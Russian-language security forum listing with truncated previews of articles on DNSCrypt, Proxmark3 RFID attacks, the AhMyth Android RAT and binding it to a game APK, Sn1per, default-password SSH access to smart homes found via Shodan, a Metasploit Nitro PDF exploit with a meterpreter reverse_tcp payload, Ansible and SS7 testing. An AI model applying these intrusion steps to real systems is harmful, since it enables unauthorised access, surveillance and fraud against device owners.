Кибербезопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

Статья dnscrypt-proxy + dmsmasq в Arch/Blackarch

  • 15 364
  • 20
Небольшое HOW-TO на тему подмены/перехвата/логирования DNS запросов со стороны провайдера. Обойти этот неприятный момент нам поможет связка dnscrypt-proxy + dmsmasq. Покажу как настроить на примере Arch Linux.

1. Для начала нам понадобится установить нужные пакеты:
Код:
# pacman -S dnscrypt-proxy dnsmasq

2. Далее редактируем файл /etc/resolv.conf меняем адрес nameserver на 127.0.0.1

2017-10-04-005241_679x745_scrot.png

3. Запрещаем изменения на файл /etc/resolv.conf
Код:
# chattr +i /etc/resolv.conf

4. По желанию правим конфиг dnscrypt-proxy.socket и меняем там порты с 53 на 40 например.
Код:
# systemctl edit dnscrypt-proxy.socket --full

5. Правим конфиг /etc/dnscrypt-proxy.conf, чтоб указать там сервер DNS. Адрес сервера выбираем из файла /usr/share/dnscrypt-proxy/dnscrypt-resolvers.csv
Код:
# localc /usr/share/dnscrypt-proxy/dnscrypt-resolvers.csv
и вписываем его в конфиг после ResolverName

2017-10-04-002707_679x745_scrot.png

6. Правим конфиг /etc/dnsmasq.conf , дописываем в самом конце
Код:
no-resolv
server=127.0.0.1#40
listen-address=127.0.0.1
не забывайте указать правильный порт из пункта 4.

7. Далее...

Статья Proxmark3 часть_2

  • 24 175
  • 20
Продолжим, обойдусь без приветствий буду описывать только то что юзаю сам и как я все это
понимаю сам, поправки дополнения приветствуются!)) Для тех кто хочет поверхностно ознакомится с взломом RFID, NFC технологиями можете купить себе за 20 баксов прибор ACR-122u утилиты под него есть в Parrot OS расмотрим популярные атаки на чипы NFC то есть высоко частотные на 13.56Мгц что бы работать в proxmark с ними введем команду hf это командой дадим ему понять что бы он задействовал свое внимание на эту частоту и начал работать с протоколами на высоких частотах самые распространенные как я уже писал это "ISO14443 Type A" если просто вобьем hf он по просит внести ясноть, мол Бро выбери картонку с которой ты желаешь работать!)) и получится у нас команда hf 14a он выдаст:
Код:
help               This help
hf list 14a      List ISO 14443a history
reader            Act like an ISO14443 Type A reader
cuids              <n> Collect n>0 ISO14443 Type A UIDs in one go
sim                 <UID> -- Fake ISO 14443a tag
snoop            Eavesdrop ISO 14443 Type A
raw                Send raw hex data to tag
hf list 14a - этой командой он выдернет из своей памяти то что вы на...

Proxmark3

  • 23 190
  • 27
proxmark3 волшебная вещь в умелых руках и при помощи Си можно попасть на охраняемые объекты там где
установлена пропускные турникеты по радио картам о них чуть позже, так же можно взломать проездной то есть добавить
поездки, снифануть данные кредитных карточек и этим самым обогатится, завести автомобиль который запускается от rfid датчика
потенциал очень большой скажу я Вам.
О TAG-ах они делятся на два вида то есть работают на двух частотах 13.56MHz и 125-134kHz со всеми тагами наш девайс дружит
скажу больше его ПО устанавливается на любую ОС > Linux, Windows, MACOS, Android
продолжим о TAG-ах начнем с HF 13.56MHz он делится на так сказать стандарты протоколы обмена то есть карта может работать на частоте
13.56MHz а протоколы обмена этих карт бывают разные самый распространенный в нашей среде это MIFARE RFID, бывает еще и ISO14443A RFID, ISO14443B, ISO15693
German Identification Card, LEGIC RFID, ICLASS RFID.
Так же с TAG-ами LF 125-134kHz AWID RFID, COTAG CHIP, EM4X CHIPs, FDX-B RFID, G Prox II RFID, HID RFID, ioProx RFID, INDALA RFID, JABLOTRON RFID,
NexWatch RFID, Noralsy RFID, Paradox RFID...

Статья Обзор инструмента AhMyth для Android: Функционал и возможности

  • 97 576
  • 136
Приветствую! Сегодня мы рассмотрим очередной RAT для Android железяк – AnMyth.

upload_2017-9-6_20-58-38.png


На мой взгляд, это довольно успешная реализация RAT, так как не требует от оператора каких либо специальных знаний. Он доступен для разных платформ с их списком, можно ознакомиться тут:

> https://github.com/AhMyth/AhMyth-Android-RAT/releases

upload_2017-9-6_20-58-58.png


Выбираем, то, что необходимо, я решил не усложнять и ставил на Windows платформу:

upload_2017-9-6_20-59-58.png


После запуска, открывается панель управления:

upload_2017-9-6_21-0-9.png


В логах уже видно, что есть один подключенный девайс, но сначала необходимо, создать RAT-файл .apk. В этом нам поможет APK Builder. Есть два варианта создания приложения, чистый AhMyth файл и скрещивание RAT с существующей программой.

Чистый RAT срабатывает на отлично, при перезагрузках админ панели, телефон/планшет снова автоматически подключается, при перезагрузках гаджета сессия тоже не теряется надолго, как только доступ к интернету возобновляется, мы опять получаем контроль над гаджетом.

Итак, совместим RAT с небольшой игрой:

upload_2017-9-6_21-0-24.png


Обратим внимание на опцию выделенную красным...

Статья Sn1per - автоматический пентест

  • 15 971
  • 21
Честно поискал по форуму описание это утилиты и был удивлен не найдя таковой.

брать тут:
git clone https://github.com/1N3/Sn1per
ставим:
cd Sn1per
chmod +x install.sh
./install.sh
Y + Enter
запускаем:
sniper

Снайпер - фреймворк призванный облегчить пентестеру жизнь на сколько это только возможно:

Сканирует, ищеи уязвимости, ищет эксплоиты, брутит, тестирует на sql, веб-уязвимости, работа c DNS, даже google hacking имеется.

Начнем с самого простого:

Роутер. Для нашего примера я взял популярный роутер TP-Link

Показывать всю портянку вывода смысла нет, покажу самое основное:

18412307.png

18412308.png

18412349.png

18412311.png

18412310.png

18412371.png


Роутер хорошо - точно определил версию сервисов, предложил эксплоиты и подобрал admin/admin КАК БЫ. Вот тут первый прокол - пароль совершенно другой. Это очень печальный факт.
Время...

Статья Безопасность Умных Домов: Анализ Потенциальных Уязвимостей

  • 11 467
  • 34
Приветствую, обитателей нашей уютной секты!
Расскажу я Вам сегодня кошмарную историю(для владельцев) про умные дома..... которые как Вы понимаете контролят все в смарт-хате, буквально все!

Изучив плотно франузского производителя этого чуда, становится понятно что он, без интернета ну ни как, что нам дорогие коллеги и на руку! Идем в SHODAN или сами знаете куда))

smarrt-h.png


отсканив IP адрес предложанный в поисковике найдется 22 порт, который как мы знаем дает возможность подключится по SSH протоколу!))

kali > ssh <IP> -l admin

ssh_smart_house.png


ну а пасс "administrator" судя по статистике его почти ни кто не меняет!

попав в управление домом можно вызвать меню!)) "help" да бы узнать чем мы можем управлять))

in_smart.png


ну и мы же хацкеры узнать пассы же нужно..?

pass.png



и для полного счатья получить root доступ!)))

root.png


по умолчанию пасса на root в этой системе нету)))

hash_pass.png


получим хэши!)))

все! с новосельем!)))

Уязвимость удаленного выполнения кода в Nitro Pro PDF Reader: Анализ и Защита

  • 3 268
  • 1
Доброго дня форумчане!
Лазал я тут намедни по свеженьким эксплоитам и наткнулся на в полне не плохую на мой взгляд эксплуатацию CVE-2017-7442
Характеристики кода: Этот модуль использует небезопасный Javascript API , реализованный в Нитро Nitro Pro PDF Reader версии 11. SAVEAS () функция JavaScript API позволяет писать произвольные файлы в файл система. Кроме того, функция launchURL () позволяет злоумышленнику выполнять локальные файлы в файловой системе и в обход диалогового окна системы безопасности Примечание: Это 100% надежный (кривой переводчик))))

1. И так у кого нет в репазитории msf данного модуля скачиваем его Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)
2. Скаченный експлойт переименновываем в (nitro_pdf_jsapi.rb) и копируем по пути :
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
3.Далее : msfconsole

use exploit/windows/fileformat/nitro_pdf_jsapi
set lhost (ваш ip)
set lport 4444
set payload windows/meterpreter/reverse_tcp
set FILENAME (имя исходной полезной...

Ansible: Революция в Управлении Инфраструктурой — От Новичка до Мастера Автоматизации

  • 4 999
  • 1
Доброго времени суток %username%.
Хотел рассказать о таком ПО как ansible. Ansible является отличным инструментом, для управления одного или нескольких серверов или выполнять на них определенных действий.
В примере у нас будет мой десктоп
PC1 = 192.168.1.1
И виртуальная машина, исполняющая роль "сервера".
VM1 = 192.168.1.2
Поехали:
1. Установка и первоначальная настройка:
1.1 Можно установить из репозитория вашей системы если есть:
sudo apt-get install ansible
1.2 По умолчанию ansible создает файлы конфигурации и файлы для исполнения в /etc/ansible
но вы можете разместить файлы исполнения где вам удобно.
1.3 cd /etc/ansible && ls -la
ansible.cfg - основной конфигурационный файл ansible.
hosts - файл в котором мы описываем хосты к которым мы будем подключаться (ansible ипользует ssh).
1.4 vim /etc/asnible/hosts
Там имеется закоментированное описание того как создавать хосты.
#[ ] в таких скобках указывается группа хостов.
# далее идут сами хосты ИМЯ ansible_....параметры.
Код:
        [VM]
        VM1 ansible_ssh_host=192.168.1.2 ansible_ssh_password=$SSHPASS ansible_sudo_pass=$SSHPASS
...

Статья SigPloit: Анализ и Исследование Уязвимостей SS7, VoIP и SIP Протоколов

  • 36 478
  • 90
Приветствую! Эта статья будет посвящена фреймворку предназначенному для проведения анализа и тестирования на уязвимости телекоммуникационных протоколов.

upload_2017-6-15_22-45-16.png


SiGploit - представляет собой систему тестирования безопасности сигнализации, предназначенную для профессионалов и специалистов в области телекоммуникационной безопасности. Используется для выявления и использования уязвимостей в протоколах сигнализации, используемых в мобильных операторах. SiGploit стремится охватить все используемые протоколы, используемые в межсетевых соединениях оператора SS7, GTP (3G), Diameter (4G) или даже SIP для IMS и VoLTE-инфраструктур, используемых в слое доступа. Рекомендации по каждой уязвимости будут предоставлены в виде руководства со списком шагов, которые необходимо сделать для повышения их безопасности.

SiGploit разработан в несколько этапов:

· Фаза 1: SS7

SiGploit намеренно начнет с уязвимостей SS7, обеспечивающих сообщения, используемые для тестирования атакующих сценариев:

A - Отслеживание местоположения, B-Call и SMS Interception C-Fraud

· Фаза 2: GTP

Эта фаза будет сосредоточена на атаках, направленных на...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Пользователи онлайн

Статистика форума

Темы
51 027
Сообщения
344 816
Пользователи
148 575
Новый пользователь
hopeless_ms